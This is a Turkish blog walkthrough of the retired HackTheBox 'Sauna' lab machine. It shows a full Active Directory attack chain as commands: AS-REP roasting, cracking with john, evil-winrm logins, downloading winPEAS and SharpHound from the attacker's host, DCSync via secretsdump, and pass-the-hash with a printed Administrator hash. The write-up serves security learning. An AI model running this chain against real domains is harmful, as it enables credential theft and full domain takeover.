Hackthebox Sauna Makinesi Çözümü

Hackthebox Sauna Makinesi Çözümü

Merhabalar , bugün hackthebox’ta emekliye ayrılan Sauna isimli makinenin çözümü anlatmaya çalışacağım.Beginner level olarak toplam 30 puan bu makine ile kerberos ve Active Directory üzerine çalışacağız.Nmap ile başlayalım.

sudo nmap -sS -sC -sV 10.10.10.175

Nmap taraması çıktısında ilk olarak dikkatimizi web servisi çekmektedir.Yine de smb portlarını ilk olarak enumerate etmeyi deniyorum.Pek birşey çıkmadı.İlk bakışta nmap çıktıma tekrar baktığımız zaman domain ismi dikkatimizi çekti.EGOISTICAL-BANK.LOCAL isminde.Bunu bir tarafa not edelim.Şimdi web servisine yönelebiliriz.

Sistemde araştırma yapsamda elime sadece kullanıcılar kaldı.GetNPUsers kullanarak kerberos servisine saldırı yapmak geliyor aklıma sadece.Forest makinesi gibi.Tüm kullanıcıları deneyince ilk etapta birşey çıkmadı.Makineyi oluşturan arkadaş kullanıcı isimlerini soyisimleriyle birlikte verdiği için bu kullanıcıların özel kullanıcı isimleri neler olabilir şeklinde bir düşünmemizi istiyor.Kullanıcı listesini özel olarak kendimiz oluşturuyoruz.

Şimdi saldırımızı yapabiliriz.

python GetNPUsers.py -request -dc-ip 10.10.10.175 -usersfile users.txt EGOISTICAL-BANK.LOCAL/ -outputfile out.txt

Şimdi şeklinde çıktımızı göndermiş olduk.Out dosyasını inceleyelim.

cat out.txt

FSmith isimli kullanıcı ismine ait kerberos hash’imizi elde ettik.Şimdi hash’imizi john tool’unu kullanarak kıralım.

sudo john --wordlist=/usr/share/wordlists/rockyou.txt --format=krb5asrep out.txt

Şimdi kullanıcı ismini ve şifremizi elde ettiğime göre sisteme giriş yapabiliriz.5985 port numaralı vsman portunu açık olduğunu nmap -Pn flag’ını deniyerek tespit ettim.vsman portu açık olduğu için evil-winrm kullanarak sisteme giriş yapabiliriz

evil-winrm -i sauna.htb -u FSmith -p Thestrokes23

Privigele Escalation

User’ımızı okuduktan sonra sistemde dikkat çekici birşey gözükmüyor gibi.sisteme winPEAS atarak sistemi enumerate etmeyi deniyorum ve defaultusername ve defaultpassword adı altında diğer kullanıcınn kimlik bilgilerini elde ettim.

Invoke-WebRequest http://10.10.15.14:8000/winPEAS.exe -o winPEAS.exe
.\winPEAS.exe

Bu kullanıcı ve şifreyle girince pek değişiklik farketmedim.Active Directory düşüncesiyle SharpHound atıyorum sisteme.Sistemde manuel komutlar bana pek açıklayıcı gelmedi açıkcası.

Invoke-WebRequest http://10.10.15.14:8000/SharpHound.ps1 -o SharpHound.ps1
Import-Module .\SharpHound.ps1
Invoke-Bloodhound -CollectionMethod All -ZipFileName cikti.zip

Zip dosyasını oluşturduk.download komutunu kullanrak cikti.zip dosyasını kendi makinemize indirebiliriz.

Artık bloodhound çalıştırarak çıktımızı incelemeliyiz.

sudo neo4j console
sudo bloodhound

Domainleri ve kullancıları extract edip sistemi incelemeye başlıyoruz.”svc_loanmgr” kullanıcısının GetchangesAll üzerinde iznine sahip olduğunu farkediyoruz.Düğüm kısımına sağ tıklayarak help menüsünü açtığımız zaman zaten bize hangi saldırıyı yapmamız gerektiğin bilgisini veriyor.

DCSync saldırısı yapmamız gerekiyor.Bu saldırıyı yapmamın birden fazla yolu var.Ben kolay olması açısından secretdump kullanarak Administrator hashini elde etmeyi deniyorum.DCSync Attack hakkında detaylı bilgiye buradan bakabilirsiniz.

sudo python secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmgr:"Moneymakestheworldgoround!"@sauna.htb

Şimdi Administrator hashini elde ettiğimize göre tekrardan evil-winrm kullanarak sisteme girip root.txt‘yi okuyabiliriz.

evil-winrm -u Administrator -H d9485863c1e9e05851aa40cbb4ab9dff -i 10.10.10.175

Okuduğunuz için teşekkür ederim.Diğer yazılarda görüşmek üzere.

Related Posts

Facebook Comments